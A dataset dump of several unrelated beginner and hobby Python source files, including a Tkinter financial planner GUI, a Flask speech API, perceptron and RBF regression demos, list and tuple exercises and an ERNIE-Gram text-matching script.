self.root.resizable(False, False)\n self.configure(background = Constants.mainWindowBgColor)\n self.pack(fill = \"both\" , expand = 1)\n\n self.mainWindowFrame = Frame(master = self)\n self.mainWindowFrame.configure(background = Constants.mainWindowBgColor)\n self.mainWindowFrame.pack(fill = \"both\", expand = 1)\n\n self.currentWindow = Constants.mainWindow\n\n self.InitMainMenu (self.mainWindowFrame)\n self.InitPlanner (self.mainWindowFrame)\n self.InitAccount (self.mainWindowFrame)\n self.InitInvestment(self.mainWindowFrame)\n self.InitNavBar (self.mainWindowFrame)\n\n # Boot Main Menu as first page for Main Window as default\n self.MainMenu(self.mainMenuFrame)\n\n\n# Main window Sub windows\n def InitMainMenu(self, parent: Frame):\n\n self.mainMenuFrame = Frame(master = parent)\n self.mainMenuFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.mainMenuFrame\n\n self.buttonInitial = ImageTk.PhotoImage(Image.open(\"Assets/Button_Initial.png\"))\n self.buttonHover = ImageTk.PhotoImage(Image.open(\"Assets/Button_Hover.png\"))\n self.buttonDown = ImageTk.PhotoImage(Image.open(\"Assets/Button_Down.png\"))\n\n buttonPaths = [ \"Assets/Button_Planner_Initial.png\", \"Assets/Button_Account_Initial.png\", \"Assets/Button_Investment_Initial.png\", \"Assets/Button_Quit_Initial.png\",\n \"Assets/Button_Planner_Hover.png\" , \"Assets/Button_Account_Hover.png\" , \"Assets/Button_Investment_Hover.png\" , \"Assets/Button_Quit_Hover.png\",\n \"Assets/Button_Planner_Down.png\" , \"Assets/Button_Account_Down.png\" , \"Assets/Button_Investment_Down.png\" , \"Assets/Button_Quit_Down.png\"]\n\n self.initialButtons = [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(0 , len(buttonPaths)//3)]\n self.hoverButtons = [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(len(buttonPaths)//3 , len(buttonPaths)//3*2)]\n self.downButtons = [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(len(buttonPaths)//3*2, len(buttonPaths))]\n \n self.plannerButton = Button(master = parent, command = lambda: self.Planner(self.plannerFrame))\n self.accountButton = Button(master = parent, command = lambda: self.Account(self.accountFrame))\n self.investButton = Button(master = parent, command = lambda: self.Investment(self.investmentFrame))\n self.quitButton = Button(master = parent, command = lambda: self.Main.ExitRoot())\n\n self.plannerButton.place(x = 640, y = Constants.firstButtonYVal, anchor = \"nw\")\n self.accountButton.place(x = 740, y = Constants.firstButtonYVal + Constants.nextButtonYDiff, anchor = \"nw\")\n self.investButton.place (x = 840, y = Constants.firstButtonYVal + Constants.nextButtonYDiff * 2, anchor = \"nw\")\n self.quitButton.place (x = 1060, y = Constants.firstButtonYVal + Constants.nextButtonYDiff * 3, anchor = \"nw\")\n\n updatedButtons = [self.plannerButton, self.accountButton, self.investButton, self.quitButton]\n\n def SetButton(button, targetImage):\n button.configure(image = targetImage, background = Constants.mainWindowBgColor)\n\n for i in range(len(updatedButtons)):\n updatedButtons[i].configure(borderwidth = 0, highlightthickness = 0, background = Constants.mainWindowBgColor, activeforeground = Constants.mainWindowBgColor, activebackground = Constants.mainWindowBgColor)\n\n butt = updatedButtons[i]\n SetButton(butt, self.initialButtons[i])\n\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.initialButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.hoverButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.downButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.initialButtons[i]))\n\n self.statusFrame = Frame(master = parent, bg = Constants.mainWindowBgColor)\n self.statusFrame.place(x = 80, y = 80, anchor = \"nw\")\n self.statusLabel = Label(master = self.statusFrame, text = \"Smart Financial Planner\", font = (\"Comic Sans MS\", 48),bg = Constants.mainWindowBgColor)\n self.statusLabel.pack()\n\n def InitPlanner(self, parent: Frame):\n\n self.plannerFrame = Frame(master = parent)\n self.plannerFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.plannerFrame\n\n self.plannerContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.plannerContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.plannerTitle = Label(master = self.plannerFrame, text = \"Planner\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n self.plannerTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.planner = GUI_Planner.GUI_Planner(parent, self.Main)\n\n def InitAccount(self, parent: Frame):\n\n self.accountFrame = Frame(master = parent)\n self.accountFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.accountFrame\n \n self.accountContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.accountContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.accountTitle = Label(master = self.accountFrame, text = \"Account\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n self.accountTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.account = GUI_Account.GUI_Account(parent, self.Main)\n\n def InitInvestment(self, parent: Frame):\n\n self.investmentFrame = Frame(master = parent)\n self.investmentFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.investmentFrame\n\n self.investmentContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.investmentContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.investmentTitle = Label(master = self.investmentFrame, text = \"Investment\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n self.investmentTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.investment = GUI_Investment.GUI_Investment(parent, self.Main)\n\n def InitNavBar(self, parent: Frame):\n \n self.navBarFrame = Frame(master = parent)\n self.navBarFrame.configure(height = 720, width = 54, bg = Constants.navBarColor)\n self.navBarFrame.pack_propagate(0)\n\n self.navButtonContainer = Frame(master = self.navBarFrame, bg = Constants.navBarColor)\n self.navButtonContainer.place(relx = 0, rely = 0, anchor = \"nw\")\n\n self.backIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Back.png\"))\n self.plannerIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Planner.png\"))\n self.accountIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Account.png\"))\n self.investmentIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Investment.png\"))\n\n self.mainMenuNavButton = Button(master = self.navButtonContainer, command = lambda: self.MainMenu(self.mainMenuFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.backIcon)\n self.plannerNavButton = Button(master = self.navButtonContainer, command = lambda: self.Planner(self.plannerFrame),\n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.plannerIcon)\n\n self.accountNavButton = Button(master = self.navButtonContainer, command = lambda: self.Account(self.accountFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.accountIcon)\n\n self.investmentNavButton = Button(master = self.navButtonContainer, command = lambda: self.Investment(self.investmentFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.investmentIcon)\n\n\n self.mainMenuNavButton.grid (row = 0, column = 0)\n self.plannerNavButton.grid (row = 1, column = 0)\n self.accountNavButton.grid (row = 2, column = 0)\n self.investmentNavButton.grid(row = 3, column = 0)\n \n def ShowNavBar(self):\n global navBarIsShown\n if (\"navBarIsShown\" in globals()):\n if (not navBarIsShown):\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"nw\")\n navBarIsShown = True\n else:\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"nw\")\n navBarIsShown = True\n\n def HideNavBar(self):\n global navBarIsShown\n if (\"navBarIsShown\" in globals()):\n if (navBarIsShown):\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"se\")\n navBarIsShown = False\n else:\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"se\")\n navBarIsShown = False\n\n pass\n\n\n# Sub window Changer\n\n def MainMenu(self, parent: Frame):\n self.HideLastWindow()\n self.mainMenuFrame.pack(fill = \"both\", expand = 1)\n self.HideNavBar()\n\n self.currentSubWindow = Constants.mainMenuSub\n\n def Planner(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.plannerSub\n pass\n\n def Account(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.accountSub\n pass\n\n def Investment(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.investmentSub\n pass\n\n\nif __name__ == \"__main__\":\n print(\"Please run main.py instead\")\n pass\n","repo_name":"TheSorrowRaven/Mini_IT_Project","sub_path":"Mini_IT_Project/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70524289066","text":"from flask import Flask, request, jsonify, make_response, send_from_directory\n\nimport librosa\nimport soundfile as sf\nimport os\nimport io\nimport wave\nimport numpy as np\nimport speech_recognition as sr\nfrom flask_cors import CORS\nfrom gtts import gTTS\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/api/text-to-speech/\", methods=[\"GET\"])\ndef get_audio(fileName):\n # Appending app path to upload folder path within app root folder\n uploads = app.root_path\n # Returning file from appended path\n return send_from_directory(uploads, fileName, as_attachment=True)\n\n\n@app.route(\"/api/text-to-speech\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"GET\":\n try:\n url = \"http://127.0.0.1:5000/api/text-to-speech/generated-speech.wav\"\n return make_response(jsonify({\"url\": url})), 200\n\n except Exception as err:\n error_message = \"An error occurred: \" + str(err)\n return make_response(jsonify({\"error\": error_message}), 500)\n else:\n try:\n dir_name = \"./\"\n test = os.listdir(dir_name)\n\n for item in test:\n if item.endswith(\".wav\"):\n os.remove(os.path.join(dir_name, item))\n\n text_data = request.get_json()[\"textData\"]\n random = round(np.random.rand() * 100000)\n generated_speech = f\"generated-speech-{random}.wav\"\n print(\"text_data\", text_data)\n # Mengkonversi teks menjadi suara menggunakan Google Text-to-Speech\n # Parameter lang: kode bahasa\n tts = gTTS(text_data, lang=\"id\")\n\n # Menyimpan file suara\n tts.save(generated_speech) # Save hasil suara menggunakan TTS\n\n y, sr = librosa.load(generated_speech)\n sf.write(\n generated_speech, y, sr\n ) # Hasil save dari TTS, dibuka dan ditulis ulang oleh librosa\n\n res = {\"fileName\": generated_speech, \"message\": \"Succes generated\"}\n return make_response(jsonify(res)), 200\n except Exception as err:\n error_message = \"An error occurred: \" + str(err)\n return make_response(jsonify({\"error\": error_message}), 500)\n\n@app.route(\"/api/speech-to-text\", methods=[\"POST\"])\ndef speech_to_text():\n recognizer = sr.Recognizer()\n audio_file = request.files[\"audio\"].read()\n # print(audio_file)\n # audio_file = request.files['name']\n # print('audio_file ==>>', audio_file)\n # audio_file = io.BytesIO(audio_file)\n # print(\"audio_file ==>>\", audio_file)\n # # Save the audio Blob as a file in the uploads folder\n # filename = secure_filename(\"uploaded_audio.wav\")\n # file_path = os.path.join(\"./temp/\", filename)\n file_path = \"./temp/tmp.wav\"\n try:\n with open(file_path, \"wb\") as f:\n f.write(audio_file)\n print(10*'<<===='+'Done')\n except Exception as err:\n print(\"Error =======>>> \", err)\n\n try:\n x, _ = librosa.load(file_path, sr=16000)\n sf.write(file_path, x, 16000)\n wave.open(file_path, \"r\")\n print('audio file =====>>> loaded')\n except Exception as err:\n print(\"Error =======>> \", err)\n\n with sr.AudioFile(file_path) as source:\n audio_data = recognizer.record(source)\n try:\n text = recognizer.recognize_google(audio_data, language=\"id-ID\")\n return jsonify({\"text\": text})\n except sr.UnknownValueError:\n print(7 * \"=======#\" + \"Speech Recognition could not understand audio\")\n return jsonify({\"error\": \"Speech Recognition could not understand the audio\"}), 400\n except sr.RequestError as e:\n print(7 * \"=======#\" + e)\n return jsonify({\"error\": f\"Speech Recognition request failed: {e}\"}), 500\n except Exception as err:\n print(\"Error ========> \", err)\n","repo_name":"ricky3knowhere/TTS_flask_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71354973546","text":"import numpy\r\n\r\nclass NaiveCyclePLA(object):\r\n def __init__(self, dimension, count):\r\n self.__dimension = dimension\r\n self.__count = count\r\n\r\n # get data\r\n def train_matrix(self, path):\r\n training_set = open(path)\r\n x_train = numpy.zeros((self.__count, self.__dimension))\r\n y_train = numpy.zeros((self.__count, 1))\r\n x = []\r\n x_count = 0\r\n for line in training_set:\r\n # add 1 dimension manually\r\n x.append(1)\r\n for str in line.split(' '):\r\n if len(str.split('\\t')) == 1:\r\n x.append(float(str))\r\n else:\r\n x.append(float(str.split('\\t')[0]))\r\n y_train[x_count, 0] = int(str.split('\\t')[1].strip())\r\n x_train[x_count, :] = x\r\n x = []\r\n x_count += 1\r\n return x_train, y_train\r\n\r\n def iteration_count(self, path):\r\n count = 0\r\n x_train, y_train = self.train_matrix(path)\r\n w = numpy.zeros((self.__dimension, 1))\r\n # loop until all x are classified right\r\n while True:\r\n flag = 0\r\n for i in range(self.__count):\r\n if numpy.dot(x_train[i, :], w)[0] * y_train[i, 0] <= 0:\r\n w += y_train[i, :] * x_train[i, :].reshape(5, 1)\r\n count += 1\r\n flag = 1\r\n if flag == 0:\r\n break\r\n return count\r\n\r\n\r\nif __name__ == '__main__':\r\n perceptron = NaiveCyclePLA(5, 400)\r\n print(perceptron.iteration_count(\"hw1_15_train.dat\"))\r\n","repo_name":"xjwhhh/LearningML","sub_path":"MLFoundation/ex1/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"38683952009","text":"# Create a list with 5 items (names of people) and write a python program to output the 2nd item.\n#Write a python program to loop through the list of countries\n#lists\n#1\nfruits = [\"apple\", \"banana\", \"cherry\",\"orange\", \"berry\", ]\nprint (fruits[1])\n#2\nprint(fruits)\nfruits[0] = \"jackfruit\"\nprint(fruits)\n#3\n#add a new item \nfruits.append(\"grapes\")\nprint(fruits)\n#4\nfruits[2]=\"Bathel\"\nprint(fruits)\n#5\ndel fruits[3]\nprint(fruits)\n#6\nprint(fruits[-1])\n#7\nnumbers=[1,2,3,4,5,6,7]\nprint(numbers[2:5])\n#8\ncountries = [ \"UK\", \"Canada\", \"Australia\", \"Germany\"]\ncountries_new = countries.copy()\nprint(\"Original list:\", countries)\nprint(\"Copied list:\", countries_new)\n#9\n#looping through the list\nfor item in countries:\n print(item)\n#10\nAnimals=[\"cow\",\"cat\",\"goat\",\"horse\"] \nAnimals.sort()\nprint(Animals)\nAnimals.sort(reverse=True)\nprint(Animals)\n#11\na_Animals=[]\nfor Animal in Animals:\n if \"a\" in Animal.lower():\n a_Animals.append(Animal)\n\nprint(\"Animals with 'a':\")\nfor Animal in a_Animals:\n print(Animal)\n #12\n#first_name = ['mary', 'vanessa',]\n#last_name= ['nansumba','nak']\n#joined_list = first_name + last_name\n\n#print(joined_list) \n#Tuples\nx=(\"samsung\",\"iphone\",\"tecno\",\"redmi\")\n#print(\"my favorite brand is\",x[1])\n#2\nsecond_last= x[-2]\n#print(second_last)\n#3\nmy_list=list(x)\nmy_list[1]=\"itel\"\nx=tuple(my_list)\n#print(\"the new tuple is\",x)\n#4\nmy_list=list(x)\nmy_list.append(\"Huawei\")\nx=tuple(my_list)\n#print(\"the new tuple is\",x)\n#5\n#for item in x:\n # print(item)\n#6\nnew_tuple =x[1:]\n#print(new_tuple)\n#7\ncities=tuple(['Kampala',\"Jinja\",\"kasangati\",\"kawanda\"])\n#print(cities)\n#8\na,b,c ,d= cities\n#print(b)\n#print(c)\n#print(d)\n#9\n#print(cities[1:4])\n#10\nfirst_name = ['mary', 'vanessa',]\nlast_name= ['nansumba','nak']\ncombined = first_name,last_name\n#print(combined)\n#11\ncolors=(\"black\", \"red\", \"green\", \"yellow\")\nresult=(colors*3)\n#print(result)\n#12\nthistuple =(1,3,7,8,7,5,4,6,8,5)\n#count_8 =thistuple.count(8)\n#print(count_8)\n#Sets\n#1\nbev={\"water\",\"soda\",\"juice\"}\n#2\nbev.add(\"honey\")\nbev.add(\"fanta\")\n#print(bev)\n#3\nmySet ={\"oven\",\"kettle\",\"microwave\",\"refrigator\"}\n#print(\"microwave\"in mySet)\n#4\nmySet.remove(\"kettle\")\n\n#print(mySet)\n#5\n#for item in mySet:\n #print(item)\n#6\nset= {1,2,3,4}\nlist1=[5,6]\nset.update(list1)\n#print(set)\n#7\nage={11,12,13}\nnames={\"vanessa\",\"mary\",\"van\"}\nnew= age.union(names)\n#print(new)\n\n#Strings\n#1\nx= \"vanessa\"\ny=20\njoined = str(y)+x\n#print (joined)\n#2\ntxt= \" Hello, Uganda!\"\nstripped =txt.strip()\n#print(stripped)\n#3\nuppercase = txt.upper()\n#print(uppercase)\n#4\nchanged = txt.replace(\"U\",\"V\")\n#print(changed)\n#5\ny=\"Iam proudly Ugandan\"\nrange_txt= y[1:4]\n#print(range_txt)\n#6\nx='ALL\"Data Scientists\" are cool!\"'\n#print(x)\n\n\n#(Dictionaries)\n#1\n#Shoes = {\n#\"brand\" : \"Nick\",\n#\"color\" : \"black\",\n #\"size\" : 40\n#}\n#print(Shoes[\"size\"])\n#2\n#Shoes[\"brand\"]=\"Adidas\"\n#print(Shoes)\n#3\n#Shoes[\"type\"]=\"sneakers\"\n#print(Shoes)\n#4\n#keys =Shoes.keys()\n#print(keys)\n#5\n#values=Shoes.values()\n#print(values)\n#6\n#if \"size\" in Shoes:\n #print(\"size is present\")\n#7\n#for item in Shoes:\n #print(item)\n#8\n#Shoes.__delitem__(\"color\") \n#print(Shoes) \n#9\n#Shoes.clear()\n#print(Shoes)\n#10\n#new_dictionary={\n #\"name\": \"nansumba\",\n #\"age\": 20,\n #\"favorites\":\"singing\"\n#}\n#dictionary=new_dictionary.copy()\n#print(dictionary)\n#print(new_dictionary)\n#11\n\n#my_dict = {\n #\"person1\": {\n # \"name\": \"John\",\n #\"age\": 30,\n #\"city\": \"New York\"\n # },\n #\"person2\": {\n # \"name\": \"Jane\",\n # \"age\": 25,\n # \"city\": \"Los Angeles\"\n #}}\n#print(my_dict)\n","repo_name":"mary-nessa/Recess","sub_path":"Mary_vanessa/mary_vanessa_nansumba_evening_day3.py","file_name":"mary_vanessa_nansumba_evening_day3.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19429913926","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rbf import RBFRegressor\n\n# Data\nNUM_SAMPLES = 100\nX = np.random.uniform(0., 1., NUM_SAMPLES)\nX = np.sort(X, axis=0)\nnoise = np.random.uniform(-0.1, 0.1, NUM_SAMPLES)\ny = np.sin(2 * np.pi * X) + noise\n\n# # Model\nrbfnet = RBFRegressor(lr=1e-2, k=2)\n# Train\nrbfnet.fit(X, y)\n# Prediction\ny_pred = rbfnet.predict(X)\n# Plotting\nplt.plot(X, y, '-o', label='true')\nplt.plot(X, y_pred, '-o', label='RBF-Net')\nplt.legend()\nplt.tight_layout()\nplt.xlabel(\"Time\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Sinusoidal Wave Estimation with RBF Regressor\")\nplt.show()\n","repo_name":"Aylarshadbakhsh/Computational-Intelligence-Course","sub_path":"RBF/rbf_regression.py","file_name":"rbf_regression.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31395908177","text":"import csv\nimport numpy as np\nimport datetime\nimport time\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport matplotlib.pyplot as plt\nimport pdb\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import *\nfrom sklearn import preprocessing\nfrom random import shuffle\nfrom sklearn.multiclass import *\nfrom sklearn.externals import joblib\nfrom sklearn.svm import *\nfrom sklearn import tree\nfrom sklearn.preprocessing import normalize\nfrom sklearn.metrics import precision_recall_fscore_support\nimport pickle\nimport binascii\n\nfrom .feature_extractor import *\n#from .randomizer import select_random_samples\nfrom .ploting_classification_report import plot_classification_report\n\nclass TimeSeriesToIR:\n\n def __init__(self, mlb=None, model=RandomForestClassifier(n_estimators=200, max_depth=None, min_samples_split=2, random_state=0)):\n self.mlb = mlb\n self.model = model\n self.num_cores = multiprocessing.cpu_count()\n self.classes_indx = []\n\n def get_binarizer(self):\n return self.mlb\n\n def train_model(self, features, include_feature=None, cluster_filepath=None, training_percent=.4):\n temp = []\n if(include_feature is None):\n temp = features\n else:\n for i in features:\n data = []\n for j in include_feature:\n data.append(i[0][j])\n data = np.array(data)\n temp.append([data, i[1], i[2]])\n\n\n index = range(len(temp))\n num_train = int(training_percent * float(len(index)))\n\n srcids = []\n\n for i in index:\n srcids.append(temp[i][2])\n\n if(cluster_filepath is None):\n X = list()\n Y = list()\n index = np.subtract(np.array(index), 1)\n for a in temp:\n X.append(normalize(np.array(a[0]).reshape((1,-1))).reshape(-1))\n Y.append(a[1][0])\n Y = np.array(Y)\n X = np.array(X)\n shuffle(index)\n X_train, X_test = X[index[:num_train]], X[index[num_train:]]\n Y_train, Y_test = Y[index[:num_train]], Y[index[num_train:]]\n else:\n X_train, X_test = list(), list()\n Y_train, Y_test = list(), list()\n randomness = select_random_samples(\n cluster_filename=cluster_filepath,\n srcids=[x for x in srcids],\n n=num_train,\n use_cluster_flag=1)\n for i in range(len(index)):\n not_in_set = True\n for j in range(len(randomness)):\n if(temp[i][2] == randomness[j]):\n X_train.append(normalize(np.array(temp[i][0]).reshape((1,-1))).reshape(-1))\n Y_train.append(temp[i][1][0])\n not_in_set = False\n if(not_in_set):\n X_test.append(normalize(np.array(temp[i][0]).reshape((1,-1))).reshape(-1))\n Y_test.append(temp[i][1][0])\n X_train = np.array(X_train)\n X_test = np.array(X_test)\n Y_train = np.array(Y_train)\n Y_test = np.array(Y_test)\n print(X_train.shape)\n print(Y_train.shape)\n self.model.fit(X_train, Y_train)\n Y_pred = self.model.predict(X_test)\n print(include_feature)\n print(\"Weighted \", precision_recall_fscore_support(Y_test, Y_pred, average='weighted'))\n print(\"Macro \", precision_recall_fscore_support(Y_test, Y_pred, average='macro'))\n print(\"Micro \", precision_recall_fscore_support(Y_test, Y_pred, average='micro'))\n print(\"Samples \", precision_recall_fscore_support(Y_test, Y_pred, average='samples'))\n\n def feature_extractor(self, srcids, schema_labels, data_path=\"data/\", num_points=5000):\n return Parallel(n_jobs=self.num_cores)(delayed(features)(self.mlb, srcids[x], schema_labels[x].lower().split(), data_path, num_points)\n for x in range(len(srcids)))\n\n def fit(self, train_features, train_srcids,\n val_srcids, train_tags_dict=None):\n self.ts_to_ir(train_features, train_srcids,\n train_features, val_srcids, True)\n\n def predict(self, test_features, test_srcids):\n return self.ts_to_ir(train_features=None,\n train_srcids=None,\n test_features=test_features,\n test_srcids=test_srcids, \n val=False)\n\n def ts_to_ir (self, train_features=None, train_srcids=None, test_features=None, test_srcids=None, val=False):\n if train_srcids:\n X_train = []\n Y_train = []\n for i in train_srcids:\n for j in train_features:\n if(j[2] == i):\n X_train.append(normalize(np.array(j[0]).reshape((1,-1))).reshape(-1))\n Y_train.append(j[1][0])\n X_train = np.array(X_train)\n Y_train = np.array(Y_train)\n print(X_train.shape)\n print(Y_train.shape)\n self.model.fit(X_train, Y_train)\n\n if test_srcids:\n test_data = []\n\n Y_test = []\n for i in test_srcids:\n for j in test_features:\n if(j[2] == i):\n test_data.append(normalize(np.array(j[0]).reshape((1,-1))).reshape(-1))\n Y_test.append(np.asarray([j[1][0]]))\n Y_pred = self.model.predict(np.array(test_data))\n if val:\n Y_test = np.vstack(Y_test)\n report = classification_report(Y_test, Y_pred)\n lines_val = report.split('\\n')\n\n self.classes_indx = []\n for i in range(len(lines_val[2 : (len(lines_val) - 2)])):\n t = lines_val[i+2].strip().split()\n if len(t) < 2: continue\n # print(float(t[-2]))\n if float(t[1]) < 0.7: continue\n self.classes_indx.append(int(t[0]))\n else:\n print(self.mlb.classes_[self.classes_indx])\n # print(range(len(Y_pred)))\n for temp in Y_pred:\n # print(len(temp))\n for i in range(len(temp)):\n if i not in self.classes_indx:\n temp[i] = 0\n # print(v)\n # temp_pred_proba = self.model.predict_proba(np.array(test_data))\n # Y_proba = []\n # for i in range(temp_pred_proba.shape[1]):\n # temp = []\n # for j in range(temp_pred_proba.shape[0]):\n # temp.append(1 - temp_pred_proba[j][i][0])\n # Y_proba.append(np.array(temp))\n # Y_proba = np.array(Y_proba)\n\n #return self.mlb.classes_, Y_pred, np.array(Y_test)#, Y_proba\n return Y_pred\n\n def ploting(self, Y_pred_val, Y_val, Y_pred_test, Y_test, fig_path=\"temp.png\"):\n report_val = classification_report(Y_val, Y_pred_val)\n report_test = classification_report(Y_test, Y_pred_test)\n plot_classification_report(report_val, report_test, self.mlb.classes_, fig_path=fig_path)\n\n\ndef features(mlb, srcid, data_labels, file_path=\"data/\", num_points=None):\n reader = csv.reader(open(file_path + srcid +\".csv\", \"r\"), delimiter=\",\")\n file_data = list(reader)\n temp = list()\n for y in file_data[1:]:\n temp.append(y[1])\n data = np.array(temp, dtype=\"float\")\n if(data_labels is None):\n Y = None\n else:\n Y = mlb.transform([set(data_labels)])\n\n if num_points is None:\n features = get_features(data)\n elif num_points >= len(data):\n features = get_features(data)\n else:\n features = get_features(data[-num_points:])\n\n return features, Y, srcid\n\n","repo_name":"plastering/plastering","sub_path":"plastering/inferencers/scrabble/time_series_to_ir.py","file_name":"time_series_to_ir.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"7013134793","text":"import time\nimport os\nimport numpy as np\n\nimport paddle\nimport paddle.nn.functional as F\nimport paddle.nn as nn\n\n\nfrom paddlenlp.datasets import load_dataset\nimport paddlenlp\nfrom paddlenlp.data import Stack, Pad, Tuple\nfrom paddlenlp.transformers import LinearDecayWithWarmup\nfrom functools import partial\n\ntokenizer = paddlenlp.transformers.ErnieGramTokenizer.from_pretrained('ernie-gram-zh')\n\ndef convert_example(example, tokenizer, max_seq_length=512, is_test=False):\n\n query, title = example[\"query\"], example[\"title\"]\n\n encoded_inputs = tokenizer(\n text=query, text_pair=title, max_seq_len=max_seq_length)\n\n input_ids = encoded_inputs[\"input_ids\"]\n token_type_ids = encoded_inputs[\"token_type_ids\"]\n\n if not is_test:\n label = np.array([example[\"label\"]], dtype=\"int64\")\n return input_ids, token_type_ids, label\n # 在预测或者评估阶段,不返回 label 字段\n else:\n return input_ids, token_type_ids\n\n\nclass PointwiseMatching(nn.Layer):\n \n # 此处的 pretained_model 在本例中会被 ERNIE-Gram 预训练模型初始化\n def __init__(self, pretrained_model, dropout=None):\n super().__init__()\n self.ptm = pretrained_model\n self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)\n\n # 语义匹配任务: 相似、不相似 2 分类任务\n self.classifier = nn.Linear(self.ptm.config[\"hidden_size\"], 2)\n\n def forward(self,\n input_ids,\n token_type_ids=None,\n position_ids=None,\n attention_mask=None):\n\n # 此处的 Input_ids 由两条文本的 token ids 拼接而成\n # token_type_ids 表示两段文本的类型编码\n # 返回的 cls_embedding 就表示这两段文本经过模型的计算之后而得到的语义表示向量\n _, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,\n attention_mask)\n\n cls_embedding = self.dropout(cls_embedding)\n\n # 基于文本对的语义表示向量进行 2 分类任务\n logits = self.classifier(cls_embedding)\n probs = F.softmax(logits)\n\n return probs\n\ndef predict(model, data_loader):\n \n batch_probs = []\n\n # 预测阶段打开 eval 模式,模型中的 dropout 等操作会关掉\n model.eval()\n\n with paddle.no_grad():\n for batch_data in data_loader:\n input_ids, token_type_ids = batch_data\n input_ids = paddle.to_tensor(input_ids)\n token_type_ids = paddle.to_tensor(token_type_ids)\n \n # 获取每个样本的预测概率: [batch_size, 2] 的矩阵\n batch_prob = model(\n input_ids=input_ids, token_type_ids=token_type_ids).numpy()\n\n batch_probs.append(batch_prob)\n batch_probs = np.concatenate(batch_probs, axis=0)\n\n return batch_probs\n\n\n# 预测数据的转换函数\n# predict 数据没有 label, 因此 convert_exmaple 的 is_test 参数设为 True\ntrans_func = partial(\n convert_example,\n tokenizer=tokenizer,\n max_seq_length=512,\n is_test=True)\n\n# 预测数据的组 batch 操作\n# predict 数据只返回 input_ids 和 token_type_ids,因此只需要 2 个 Pad 对象作为 batchify_fn\nbatchify_fn = lambda samples, fn=Tuple(\n Pad(axis=0, pad_val=tokenizer.pad_token_id), # input_ids\n Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # segment_ids\n): [data for data in fn(samples)]\n\n# 加载预测数据\ntest_ds = load_dataset(\"lcqmc\", splits=[\"test\"])\n\nbatch_sampler = paddle.io.BatchSampler(test_ds, batch_size=32, shuffle=False)\n\n# 生成预测数据 data_loader\npredict_data_loader =paddle.io.DataLoader(\n 